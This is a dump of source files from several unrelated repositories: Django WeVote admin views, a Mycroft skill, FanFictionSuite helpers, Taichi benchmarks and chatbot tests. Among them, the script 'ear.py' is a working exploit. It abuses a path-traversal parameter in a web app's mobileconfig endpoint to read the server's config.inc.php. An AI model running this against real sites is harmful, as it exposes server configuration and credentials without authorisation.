if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
messages_on_stage = get_messages(request)
organization_id = convert_to_int(organization_id)
organization_on_stage_found = False
try:
organization_on_stage = Organization.objects.get(id=organization_id)
organization_on_stage_found = True
except Organization.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except Organization.DoesNotExist:
# This is fine, create new
pass
if not organization_on_stage_found:
messages.add_message(request, messages.INFO,
'Could not find organization when trying to edit a position.')
return HttpResponseRedirect(reverse('organization:organization_position_list', args=([organization_id])))
# Get the existing position
organization_position_on_stage = PositionEntered()
organization_position_on_stage_found = False
position_entered_manager = PositionEnteredManager()
results = position_entered_manager.retrieve_position_from_we_vote_id(position_we_vote_id)
if results['position_found']:
organization_position_on_stage_found = True
organization_position_on_stage = results['position']
if not organization_position_on_stage_found:
messages.add_message(request, messages.INFO,
'Could not find organization position when trying to edit.')
return HttpResponseRedirect(reverse('organization:organization_position_list', args=([organization_id])))
# Note: We have access to the candidate campaign through organization_position_on_stage.candidate_campaign
election_list = Election.objects.all()
if organization_position_on_stage_found:
template_values = {
'is_in_edit_mode': True,
'messages_on_stage': messages_on_stage,
'organization': organization_on_stage,
'organization_position': organization_position_on_stage,
'possible_stances_list': ORGANIZATION_STANCE_CHOICES,
'stance_selected': organization_position_on_stage.stance,
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
}
return render(request, 'organization/organization_position_edit.html', template_values)
@login_required
def organization_position_edit_process_view(request):
"""
:param request:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = convert_to_int(request.POST.get('google_civic_election_id', 0))
organization_id = convert_to_int(request.POST.get('organization_id', 0))
position_we_vote_id = request.POST.get('position_we_vote_id', '')
candidate_campaign_id = convert_to_int(request.POST.get('candidate_campaign_id', 0))
contest_measure_id = convert_to_int(request.POST.get('contest_measure_id', 0))
stance = request.POST.get('stance', SUPPORT) # Set a default if stance comes in empty
statement_text = request.POST.get('statement_text', '') # Set a default if stance comes in empty
more_info_url = request.POST.get('more_info_url', '')
go_back_to_add_new = False
candidate_campaign_we_vote_id = ""
google_civic_candidate_name = ""
contest_measure_we_vote_id = ""
google_civic_measure_title = ""
candidate_campaign_on_stage_found = False
contest_measure_on_stage_found = False
organization_position_on_stage = PositionEntered()
organization_on_stage = Organization()
candidate_campaign_on_stage = CandidateCampaign()
contest_measure_on_stage = ContestMeasure()
state_code = ""
position_entered_manager = PositionEnteredManager()
# Make sure this is a valid organization before we try to save a position
organization_on_stage_found = False
organization_we_vote_id = ""
try:
organization_query = Organization.objects.filter(id=organization_id)
if organization_query.count():
organization_on_stage = organization_query[0]
organization_we_vote_id = organization_on_stage.we_vote_id
organization_on_stage_found = True
except Exception as e:
# If we can't retrieve the organization, we cannot proceed
handle_record_not_found_exception(e, logger=logger)
if not organization_on_stage_found:
messages.add_message(
request, messages.ERROR,
"Could not find the organization when trying to create or edit a new position.")
return HttpResponseRedirect(reverse('organization:organization_list', args=()))
# Now retrieve the CandidateCampaign or the ContestMeasure so we can save it with the Position
# We need either candidate_campaign_id or contest_measure_id
if candidate_campaign_id:
try:
candidate_campaign_on_stage = CandidateCampaign.objects.get(id=candidate_campaign_id)
candidate_campaign_on_stage_found = True
candidate_campaign_we_vote_id = candidate_campaign_on_stage.we_vote_id
google_civic_candidate_name = candidate_campaign_on_stage.google_civic_candidate_name
state_code = candidate_campaign_on_stage.state_code
except CandidateCampaign.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except CandidateCampaign.DoesNotExist as e:
handle_record_not_found_exception(e, logger=logger)
if not candidate_campaign_on_stage_found:
messages.add_message(
request, messages.ERROR,
"Could not find Candidate's campaign when trying to create or edit a new position.")
if positive_value_exists(position_we_vote_id):
return HttpResponseRedirect(
reverse('organization:organization_position_edit', args=([organization_id], [position_we_vote_id])) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&stance=" + stance +
"&statement_text=" + statement_text +
"&more_info_url=" + more_info_url +
"&candidate_and_measure_not_found=1"
)
else:
return HttpResponseRedirect(
reverse('organization:organization_position_new', args=([organization_id])) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&stance=" + stance +
"&statement_text=" + statement_text +
"&more_info_url=" + more_info_url +
"&candidate_and_measure_not_found=1"
)
contest_measure_id = 0
elif contest_measure_id:
try:
contest_measure_on_stage = ContestMeasure.objects.get(id=contest_measure_id)
contest_measure_on_stage_found = True
contest_measure_we_vote_id = contest_measure_on_stage.we_vote_id
google_civic_measure_title = contest_measure_on_stage.google_civic_measure_title
state_code = contest_measure_on_stage.state_code
except CandidateCampaign.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except CandidateCampaign.DoesNotExist as e:
handle_record_not_found_exception(e, logger=logger)
if not contest_measure_on_stage_found:
messages.add_message(
request, messages.ERROR,
"Could not find measure when trying to create or edit a new position.")
if positive_value_exists(position_we_vote_id):
return HttpResponseRedirect(
reverse('organization:organization_position_edit', args=([organization_id], [position_we_vote_id])) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&stance=" + stance +
"&statement_text=" + statement_text +
"&more_info_url=" + more_info_url +
"&candidate_and_measure_not_found=1"
)
else:
return HttpResponseRedirect(
reverse('organization:organization_position_new', args=([organization_id])) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&stance=" + stance +
"&statement_text=" + statement_text +
"&more_info_url=" + more_info_url +
"&candidate_and_measure_not_found=1"
)
candidate_campaign_id = 0
else:
messages.add_message(
request, messages.ERROR,
"Unable to find either Candidate or Measure.")
return HttpResponseRedirect(
reverse('organization:organization_position_new', args=([organization_id])) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&stance=" + stance +
"&statement_text=" + statement_text +
"&more_info_url=" + more_info_url +
"&candidate_and_measure_not_found=1"
)
organization_position_on_stage_found = False
# Retrieve position from position_we_vote_id if it exists already
if positive_value_exists(position_we_vote_id):
results = position_entered_manager.retrieve_position_from_we_vote_id(position_we_vote_id)
if results['position_found']:
organization_position_on_stage_found = True
organization_position_on_stage = results['position']
organization_position_found_from_new_form = False
if not organization_position_on_stage_found: # Position not found from position_we_vote_id
# If a position_we_vote_id hasn't been passed in, then we are trying to create a new position.
# Check to make sure a position for this org, candidate and election doesn't already exist
if candidate_campaign_id:
results = position_entered_manager.retrieve_organization_candidate_campaign_position(
organization_id, candidate_campaign_id, google_civic_election_id)
elif contest_measure_id:
results = position_entered_manager.retrieve_organization_contest_measure_position(
organization_id, contest_measure_id, google_civic_election_id)
else:
messages.add_message(
request, messages.ERROR,
"Missing both candidate_campaign_id and contest_measure_id.")
return HttpResponseRedirect(
reverse('organization:organization_position_list', args=([organization_id]))
)
if results['MultipleObjectsReturned']:
messages.add_message(
request, messages.ERROR,
"We found more than one existing positions for this candidate. Please delete all but one position.")
return HttpResponseRedirect(
reverse('organization:organization_position_list', args=([organization_id]))
)
elif results['position_found']:
organization_position_on_stage_found = True
organization_position_on_stage = results['position']
organization_position_found_from_new_form = True
# Now save existing, or create new
success = False
try:
if organization_position_on_stage_found:
# Update the position
organization_position_on_stage.stance = stance
organization_position_on_stage.google_civic_election_id = google_civic_election_id
if not organization_position_found_from_new_form or positive_value_exists(more_info_url):
# Only update this if we came from update form, or there is a value in the incoming variable
organization_position_on_stage.more_info_url = more_info_url
if not organization_position_found_from_new_form or positive_value_exists(statement_text):
# Only update this if we came from update form, or there is a value in the incoming variable
organization_position_on_stage.statement_text = statement_text
if not positive_value_exists(organization_position_on_stage.organization_we_vote_id):
organization_position_on_stage.organization_we_vote_id = organization_on_stage.we_vote_id
organization_position_on_stage.candidate_campaign_id = candidate_campaign_id
organization_position_on_stage.candidate_campaign_we_vote_id = candidate_campaign_we_vote_id
organization_position_on_stage.google_civic_candidate_name = google_civic_candidate_name
organization_position_on_stage.contest_measure_id = contest_measure_id
organization_position_on_stage.contest_measure_we_vote_id = contest_measure_we_vote_id
organization_position_on_stage.google_civic_measure_title = google_civic_measure_title
organization_position_on_stage.state_code = state_code
organization_position_on_stage.save()
organization_position_on_stage = position_entered_manager.refresh_cached_position_info(
organization_position_on_stage)
success = True
if positive_value_exists(candidate_campaign_we_vote_id):
messages.add_message(
request, messages.INFO,
"Position on {candidate_name} updated.".format(
candidate_name=candidate_campaign_on_stage.display_candidate_name()))
elif positive_value_exists(contest_measure_we_vote_id):
messages.add_message(
request, messages.INFO,
"Position on {measure_title} updated.".format(
measure_title=contest_measure_on_stage.measure_title))
else:
# Create new
# Note that since we are processing a volunteer/admin entry tool, we can always save to the PositionEntered
# table, and don't need to worry about PositionForFriends
organization_position_on_stage = PositionEntered(
organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
candidate_campaign_id=candidate_campaign_id,
candidate_campaign_we_vote_id=candidate_campaign_we_vote_id,
google_civic_candidate_name=google_civic_candidate_name,
contest_measure_id=contest_measure_id,
contest_measure_we_vote_id=contest_measure_we_vote_id,
google_civic_measure_title=google_civic_measure_title,
google_civic_election_id=google_civic_election_id,
stance=stance,
statement_text=statement_text,
more_info_url=more_info_url,
state_code=state_code,
)
organization_position_on_stage.save()
organization_position_on_stage = position_entered_manager.refresh_cached_position_info(
organization_position_on_stage)
success = True
if positive_value_exists(candidate_campaign_we_vote_id):
messages.add_message(
request, messages.INFO,
"New position on {candidate_name} saved.".format(
candidate_name=candidate_campaign_on_stage.display_candidate_name()))
elif positive_value_exists(contest_measure_we_vote_id):
messages.add_message(
request, messages.INFO,
"New position on {measure_title} saved.".format(
measure_title=contest_measure_on_stage.measure_title))
go_back_to_add_new = True
except Exception as e:
pass
# If the position was saved, then update the voter_guide entry
if success:
voter_guide_manager = VoterGuideManager()
results = voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
organization_on_stage.we_vote_id, google_civic_election_id)
# if results['success']:
if go_back_to_add_new:
return HttpResponseRedirect(
reverse('organization:organization_position_new', args=(organization_on_stage.id,)) +
"?google_civic_election_id=" + str(google_civic_election_id))
else:
return HttpResponseRedirect(
reverse('organization:organization_position_list', args=(organization_on_stage.id,)))
```
#### File: WeVoteServer/voter_guide/views_admin.py
```python
from .controllers import voter_guides_import_from_master_server
from .models import VoterGuide, VoterGuideListManager, VoterGuideManager
from .serializers import VoterGuideSerializer
from admin_tools.views import redirect_to_sign_in_page
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.contrib.messages import get_messages
from django.http import HttpResponseRedirect
from django.shortcuts import render
from election.models import Election, ElectionManager, TIME_SPAN_LIST
from organization.models import Organization, OrganizationListManager
from organization.views_admin import organization_edit_process_view
from position.models import PositionEntered, PositionForFriends, PositionListManager
from rest_framework.views import APIView
from rest_framework.response import Response
from voter.models import voter_has_authority
from wevote_functions.functions import convert_to_int, extract_twitter_handle_from_text_string, positive_value_exists, \
STATE_CODE_MAP
# This page does not need to be protected.
class VoterGuidesSyncOutView(APIView):
def get(self, request, format=None):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
voter_guide_list = VoterGuide.objects.all()
if positive_value_exists(google_civic_election_id):
voter_guide_list = voter_guide_list.filter(google_civic_election_id=google_civic_election_id)
serializer = VoterGuideSerializer(voter_guide_list, many=True)
return Response(serializer.data)
@login_required
def voter_guides_import_from_master_server_view(request):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
state_code = request.GET.get('state_code', '')
results = voter_guides_import_from_master_server(request, google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.ERROR, results['status'])
else:
messages.add_message(request, messages.INFO, 'Voter Guides import completed. '
'Saved: {saved}, Updated: {updated}, '
'Master data not imported (local duplicates found): '
'{duplicates_removed}, '
'Not processed: {not_processed}'
''.format(saved=results['saved'],
updated=results['updated'],
duplicates_removed=results['duplicates_removed'],
not_processed=results['not_processed']))
return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + "?google_civic_election_id=" +
str(google_civic_election_id) + "&state_code=" + str(state_code))
@login_required
def generate_voter_guides_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
voter_guide_stored_for_this_organization = []
# voter_guide_stored_for_this_public_figure = []
# voter_guide_stored_for_this_voter = []
voter_guide_created_count = 0
voter_guide_updated_count = 0
# What elections do we want to generate voter_guides for?
election_list = Election.objects.all()
# Cycle through organizations
organization_list = Organization.objects.all()
for organization in organization_list:
# Cycle through elections. Find out position count for this org for each election.
# If > 0, then create a voter_guide entry
if organization.id not in voter_guide_stored_for_this_organization:
for election in election_list:
# organization hasn't had voter guides stored yet.
# Search for positions with this organization_id and google_civic_election_id
google_civic_election_id = int(election.google_civic_election_id) # Convert VarChar to Integer
positions_count = PositionEntered.objects.filter(
organization_id=organization.id,
google_civic_election_id=google_civic_election_id).count()
if positions_count > 0:
voter_guide_manager = VoterGuideManager()
results = voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
organization.we_vote_id, election.google_civic_election_id)
if results['success']:
if results['new_voter_guide_created']:
voter_guide_created_count += 1
else:
voter_guide_updated_count += 1
for time_span in TIME_SPAN_LIST:
# organization hasn't had voter guides stored yet.
# Search for positions with this organization_id and time_span
positions_count = PositionEntered.objects.filter(
organization_id=organization.id,
vote_smart_time_span=time_span).count()
if positions_count > 0:
voter_guide_manager = VoterGuideManager()
results = voter_guide_manager.update_or_create_organization_voter_guide_by_time_span(
organization.we_vote_id, time_span)
if results['success']:
if results['new_voter_guide_created']:
voter_guide_created_count += 1
else:
voter_guide_updated_count += 1
voter_guide_stored_for_this_organization.append(organization.id)
# Cycle through public figures
# voter_guide_manager = VoterGuideManager()
# voter_guide_manager.update_or_create_public_figure_voter_guide(1234, 'wv02')
# Cycle through voters
# voter_guide_manager = VoterGuideManager()
# voter_guide_manager.update_or_create_voter_voter_guide(1234, 'wv03')
messages.add_message(request, messages.INFO,
'{voter_guide_created_count} voter guides created, '
'{voter_guide_updated_count} updated.'.format(
voter_guide_created_count=voter_guide_created_count,
voter_guide_updated_count=voter_guide_updated_count,
))
return HttpResponseRedirect(reverse('voter_guide:voter_guide_list', args=()))
@login_required
def generate_voter_guides_for_one_election_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
if not positive_value_exists(google_civic_election_id):
messages.add_message(request, messages.ERROR,
'Cannot generate voter guides for one election: google_civic_election_id missing')
return HttpResponseRedirect(reverse('voter_guide:voter_guide_list', args=()))
voter_guide_stored_for_this_organization = []
# voter_guide_stored_for_this_public_figure = []
# voter_guide_stored_for_this_voter = []
voter_guide_created_count = 0
voter_guide_updated_count = 0
# What elections do we want to generate voter_guides for?
election_list = Election.objects.all()
# Cycle through organizations
organization_list = Organization.objects.all()
for organization in organization_list:
# Cycle through elections. Find out position count for this org for each election.
# If > 0, then create a voter_guide entry
if organization.id not in voter_guide_stored_for_this_organization:
# organization hasn't had voter guides stored yet in this run through.
# Search for positions with this organization_id and google_civic_election_id
positions_count = PositionEntered.objects.filter(
organization_id=organization.id,
google_civic_election_id=google_civic_election_id).count()
if positions_count > 0:
voter_guide_manager = VoterGuideManager()
results = voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
organization.we_vote_id, google_civic_election_id)
if results['success']:
if results['new_voter_guide_created']:
voter_guide_created_count += 1
else:
voter_guide_updated_count += 1
for time_span in TIME_SPAN_LIST:
# organization hasn't had voter guides stored yet.
# Search for positions with this organization_id and time_span
positions_count = PositionEntered.objects.filter(
organization_id=organization.id,
vote_smart_time_span=time_span).count()
if positions_count > 0:
voter_guide_manager = VoterGuideManager()
results = voter_guide_manager.update_or_create_organization_voter_guide_by_time_span(
organization.we_vote_id, time_span)
if results['success']:
if results['new_voter_guide_created']:
voter_guide_created_count += 1
else:
voter_guide_updated_count += 1
voter_guide_stored_for_this_organization.append(organization.id)
# Cycle through public figures
# voter_guide_manager = VoterGuideManager()
# voter_guide_manager.update_or_create_public_figure_voter_guide(1234, 'wv02')
# Cycle through voters
# voter_guide_manager = VoterGuideManager()
# voter_guide_manager.update_or_create_voter_voter_guide(1234, 'wv03')
messages.add_message(request, messages.INFO,
'{voter_guide_created_count} voter guides created, '
'{voter_guide_updated_count} updated.'.format(
voter_guide_created_count=voter_guide_created_count,
voter_guide_updated_count=voter_guide_updated_count,
))
return HttpResponseRedirect(reverse('voter_guide:voter_guide_list', args=()))
@login_required
def refresh_existing_voter_guides_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
voter_guide_updated_count = 0
# Cycle through existing voter_guides
voter_guide_list_manager = VoterGuideListManager()
voter_guide_manager = VoterGuideManager()
results = voter_guide_list_manager.retrieve_all_voter_guides()
if results['voter_guide_list_found']:
voter_guide_list = results['voter_guide_list']
for voter_guide in voter_guide_list:
if positive_value_exists(voter_guide.organization_we_vote_id):
if positive_value_exists(voter_guide.google_civic_election_id):
results = voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
voter_guide.organization_we_vote_id, voter_guide.google_civic_election_id)
if results['success']:
voter_guide_updated_count += 1
elif positive_value_exists(voter_guide.vote_smart_time_span):
results = voter_guide_manager.update_or_create_organization_voter_guide_by_time_span(
voter_guide.organization_we_vote_id, voter_guide.vote_smart_time_span)
if results['success']:
voter_guide_updated_count += 1
messages.add_message(request, messages.INFO,
'{voter_guide_updated_count} updated.'.format(
voter_guide_updated_count=voter_guide_updated_count,
))
return HttpResponseRedirect(reverse('voter_guide:voter_guide_list', args=()))
@login_required
def voter_guide_list_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
voter_guide_list = []
voter_guide_list_object = VoterGuideListManager()
if positive_value_exists(google_civic_election_id):
results = voter_guide_list_object.retrieve_voter_guides_for_election(
google_civic_election_id=google_civic_election_id)
if results['success']:
voter_guide_list = results['voter_guide_list']
else:
order_by = "google_civic_election_id"
results = voter_guide_list_object.retrieve_all_voter_guides(order_by)
if results['success']:
voter_guide_list = results['voter_guide_list']
modified_voter_guide_list = []
position_list_manager = PositionListManager()
for one_voter_guide in voter_guide_list:
# How many Publicly visible positions are there in this election on this voter guide?
retrieve_public_positions = True
one_voter_guide.number_of_public_positions = position_list_manager.fetch_positions_count_for_voter_guide(
one_voter_guide.organization_we_vote_id, one_voter_guide.google_civic_election_id,
retrieve_public_positions)
# How many Friends-only visible positions are there in this election on this voter guide?
retrieve_public_positions = False
one_voter_guide.number_of_friends_only_positions = position_list_manager.fetch_positions_count_for_voter_guide(
one_voter_guide.organization_we_vote_id, one_voter_guide.google_civic_election_id,
retrieve_public_positions)
modified_voter_guide_list.append(one_voter_guide)
election_list = Election.objects.order_by('-election_day_text')
messages_on_stage = get_messages(request)
template_values = {
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
'messages_on_stage': messages_on_stage,
'voter_guide_list': modified_voter_guide_list,
}
return render(request, 'voter_guide/voter_guide_list.html', template_values)
@login_required
def voter_guide_search_view(request):
"""
Before creating a voter guide, search for an existing organization
:param request:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
# A positive value in google_civic_election_id means we want to create a voter guide for this org for this election
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
messages_on_stage = get_messages(request)
election_manager = ElectionManager()
upcoming_election_list = []
results = election_manager.retrieve_upcoming_elections()
if results['success']:
upcoming_election_list = results['election_list']
state_list = STATE_CODE_MAP
sorted_state_list = sorted(state_list.items())
template_values = {
'messages_on_stage': messages_on_stage,
'upcoming_election_list': upcoming_election_list,
'google_civic_election_id': google_civic_election_id,
'state_list': sorted_state_list,
}
return render(request, 'voter_guide/voter_guide_search.html', template_values)
@login_required
def voter_guide_search_process_view(request):
"""
Process the new or edit organization forms
:param request:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
add_organization_button = request.POST.get('add_organization_button', False)
if add_organization_button:
return organization_edit_process_view(request)
organization_name = request.POST.get('organization_name', '')
organization_twitter_handle = request.POST.get('organization_twitter_handle', '')
organization_facebook = request.POST.get('organization_facebook', '')
organization_website = request.POST.get('organization_website', '')
# state_served_code = request.POST.get('state_served_code', False)
# Save this variable so we have it on the "Add New Position" page
google_civic_election_id = request.POST.get('google_civic_election_id', 0)
# Filter incoming data
organization_twitter_handle = extract_twitter_handle_from_text_string(organization_twitter_handle)
# Search for organizations that match
organization_email = ''
organization_list_manager = OrganizationListManager()
results = organization_list_manager.organization_search_find_any_possibilities(
organization_name, organization_twitter_handle, organization_website, organization_email,
organization_facebook)
if results['organizations_found']:
organizations_list = results['organizations_list']
organizations_count = len(organizations_list)
messages.add_message(request, messages.INFO, 'We found {count} existing organization(s) '
'that might match.'.format(count=organizations_count))
else:
organizations_list = []
messages.add_message(request, messages.INFO, 'No voter guides found with those search terms. '
'Please try again. ')
election_manager = ElectionManager()
upcoming_election_list = []
results = election_manager.retrieve_upcoming_elections()
if results['success']:
upcoming_election_list = results['election_list']
messages_on_stage = get_messages(request)
template_values = {
'messages_on_stage': messages_on_stage,
'organizations_list': organizations_list,
'organization_name': organization_name,
'organization_twitter_handle': organization_twitter_handle,
'organization_facebook': organization_facebook,
'organization_website': organization_website,
'upcoming_election_list': upcoming_election_list,
'google_civic_election_id': google_civic_election_id,
}
return render(request, 'voter_guide/voter_guide_search.html', template_values)
``` |
{
"source": "josephflowers-ra/cinder-skill",
"score": 2
} |
#### File: josephflowers-ra/cinder-skill/__init__.py
```python
from mycroft import MycroftSkill, intent_file_handler
class Cinder(MycroftSkill):
def __init__(self):
MycroftSkill.__init__(self)
@intent_file_handler('cinder.intent')
def handle_cinder(self, message):
self.speak_dialog('cinder')
def create_skill():
return Cinder()
``` |
{
"source": "joseph-fuzzing/butian",
"score": 2
} |
#### File: joseph-fuzzing/butian/ear.py
```python
import requests
import re
import time
def checkbug():
burp0_url = url+"/source/pack/mobileconfig/ajax.php"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
urlcode=requests.get(burp0_url, headers=burp0_headers).status_code
return urlcode
def Get_order():
burp0_url = url+"/source/pack/alipay/pay.php?rmb=1000"
burp0_cookies = {"PHPSESSID": "pc079g7m6inb1ukh4h9t1om9e3", "in_userid": in_userid, "in_username": in_username, "in_userpassword": in_userpassword}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
order_html=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies).text
Reorder=re.compile(r'name=\'out_trade_no\' value=\'(.*?)\'')
return Reorder.findall(order_html)[0]
def Get_date(out_trade_no):
burp0_url = url+"/source/pack/alipay/pay_notify.php"
burp0_cookies = {"PHPSESSID": "pc079g7m6inb1ukh4h9t1om9e3", "in_userid": in_userid, "in_username": in_username, "in_userpassword": in_userpassword}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"out_trade_no": out_trade_no}
Get_header=requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data).headers
Date=int(time.mktime(time.strptime(Get_header['Date'],"%a, %d %b %Y %H:%M:%S GMT")))
return Date
def readfile(userid,Date):
burp0_url = url+"/source/pack/mobileconfig/ajax.php?ac=mobileconfig&aicon=../../../source/system/config.inc.php"
burp0_cookies = {"PHPSESSID": "pc079g7m6inb1ukh4h9t1om9e3", "in_userid": in_userid, "in_username": in_username, "in_userpassword": in_userpassword}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh,en;q=0.9,zh-CN;q=0.8", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
#burp0_data = {"out_trade_no": userid+"-"+str(Date)}
fileDate_html=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies).text
return fileDate_html
def main():
global in_userpassword,in_userid,in_username,url
in_userid="2"
in_username="<EMAIL>"
in_userpassword="<PASSWORD>"
url=raw_input('readfile url:')
if checkbug()==200:
out_trade_no=Get_order()
Date=Get_date(out_trade_no)
fileDate_html=readfile(in_userid,Date)
if(len(fileDate_html)>6):
print(fileDate_html)
exit();
main()
if __name__ == '__main__':
main()
``` |
{
"source": "JosephGAdams/FanFictionSuite",
"score": 3
} |
#### File: FanFictionSuite/classes/folder_structure.py
```python
import os
import os.path
class folder_structure:
def make_directory(self, location, dir_name):
folder_location = os.path.join(location, dir_name)
try:
os.mkdir(folder_location, 0777)
except Exception as e:
print e
return folder_location
def make_structure(self, location):
epub_folder = self.make_directory(location, 'epub_folder')
meta_inf_folder = self.make_directory(epub_folder, 'META-INF')
oebps_folder = self.make_directory(epub_folder, 'OEBPS')
paths = {
'epub_folder_location': epub_folder,
'meta-inf_folder_location': meta_inf_folder,
'oebps_folder_location': oebps_folder,
}
return paths
```
#### File: FanFictionSuite/classes/general_utils.py
```python
import wx
error_messages = {'2': 'File not found'}
class utils:
def error_alert_box(self, message):
wx.MessageBox('{message}\nStory listing will be removed, re-add manually.'.format(message=message),
'Error', wx.OK | wx.ICON_ERROR)
```
#### File: FanFictionSuite/classes/move_book_content.py
```python
import shutil
import os
import os.path
class move_content:
def move_files(self, files, location, content_loc):
for each in files['file_location']:
file_loc = os.path.join(os.path.abspath(each))
name = os.path.basename(file_loc)
src = file_loc
dst = os.path.join(content_loc, name)
shutil.copyfile(src, dst)
``` |
{
"source": "josephgalestian/taichiV2-master",
"score": 2
} |
#### File: benchmarks/microbenchmarks/memcpy.py
```python
from microbenchmarks._items import BenchmarkItem, Container, DataSize, DataType
from microbenchmarks._metric import MetricType
from microbenchmarks._plan import BenchmarkPlan
from microbenchmarks._utils import dtype_size, fill_random, scaled_repeat_times
import taichi as ti
def memcpy_default(arch, repeat, container, dtype, dsize, get_metric):
@ti.kernel
def memcpy_field(dst: ti.template(), src: ti.template()):
for I in ti.grouped(dst):
dst[I] = src[I]
@ti.kernel
def memcpy_array(dst: ti.any_arr(), src: ti.any_arr()):
for I in ti.grouped(dst):
dst[I] = src[I]
repeat = scaled_repeat_times(arch, dsize, repeat)
num_elements = dsize // dtype_size(dtype)
x = container(dtype, num_elements)
y = container(dtype, num_elements)
func = memcpy_field if container == ti.field else memcpy_array
fill_random(x, dtype, container)
return get_metric(repeat, func, y, x)
class MemcpyPlan(BenchmarkPlan):
def __init__(self, arch: str):
super().__init__('memcpy', arch, basic_repeat_times=10)
self.create_plan(Container(), DataType(), DataSize(), MetricType())
self.add_func(['field'], memcpy_default)
self.add_func(['ndarray'], memcpy_default)
``` |
{
"source": "JosephGarrone/uqcsbot-1",
"score": 2
} |
#### File: uqcsbot-1/test/test_water.py
```python
from test.conftest import MockUQCSBot, TEST_CHANNEL_ID
import re
def test_water_valid_message(uqcsbot: MockUQCSBot):
"""
Test !water <REGION> returns a reading
"""
uqcsbot.post_message(TEST_CHANNEL_ID, '!water SEQ')
messages = uqcsbot.test_messages.get(TEST_CHANNEL_ID, [])
assert len(messages) == 2
assert re.compile(r"(?:.*) is at \*\d+\.\d+\%\* \((?:.*?)ML of (?:.*?)ML\)").match(messages[-1]['text'])
def test_water_invalid_region(uqcsbot: MockUQCSBot):
"""
Test !water <INVALID_REGION> returns a warning
"""
uqcsbot.post_message(TEST_CHANNEL_ID, '!water abcdefghijklmnopqrstuvwxyz')
messages = uqcsbot.test_messages.get(TEST_CHANNEL_ID, [])
assert len(messages) == 2
assert re.compile(r"No region or alias found matching '(?:.*?)'").match(messages[-1]['text'])
def test_water_list(uqcsbot: MockUQCSBot):
"""
Test !water <LIST> returns a listing
"""
